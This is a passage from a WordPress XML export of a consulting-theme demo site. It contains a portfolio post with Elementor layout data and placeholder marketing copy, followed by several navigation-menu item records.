										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-2-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener">
						Twitter
											</a>
					<a target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>806</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:41:19]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:41:19]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[money-market]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[807]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"16f55f4a","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"418cd74c","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"1ea00633","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1aec01ac","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"54e30f49","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"3f7f7a0b","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"768a37c4","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"bf03c4e","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"14cfe9ce","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3803acb8","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"43e55b12","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"6e436e0b","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6c09acaf","elType":"widget","settings":{"editor":"<p>April 12, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a7c3887","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"63f2a3ed","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"132a8999","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"73f1d5f9","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"116d0b4d","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"0a6b843","elType":"section","settings":[],"elements":[{"id":"e23050d","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"e98f9e0","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"c5a3fb9","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7ccc6ca","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"c1414cf","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"f14ee69","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9769254","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"fe4fa33","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"0f33b6c","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"fa801c1","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"1ddde9d","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"c25ce84","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"d5e07e1","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"bf9bc15","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"cc02ab4","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"ab9a43b","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"3aefa4b","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"2cc51b7","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"80432b2","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"0d5a654","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"fc4b60e","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #4b83fc;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"18e9bfd","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"0e1e69d","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-2.png","id":1480},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"d3f5498","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1341/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1341/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1341</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1341]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>15</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1340]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[858]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Services 1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services-1/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/our-services-1/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1342</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-services-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>4</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1292]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[868]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1343/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1343/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1343</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1343]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>14</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1340]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[847]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Blog List</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/blog-list/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/blog-list/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1344</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog-list]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>26</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
